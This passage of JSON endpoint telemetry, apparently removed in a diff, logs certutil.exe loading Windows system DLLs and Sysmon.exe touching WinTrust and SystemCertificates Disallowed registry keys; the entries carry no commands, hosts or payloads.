- "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496360000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573496360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573496360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "certutil.exe", - "image_path": "C:\\Windows\\System32\\certutil.exe", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496360000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573497140000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573497140000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "certcli.dll", - "image_path": "C:\\Windows\\System32\\certcli.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": 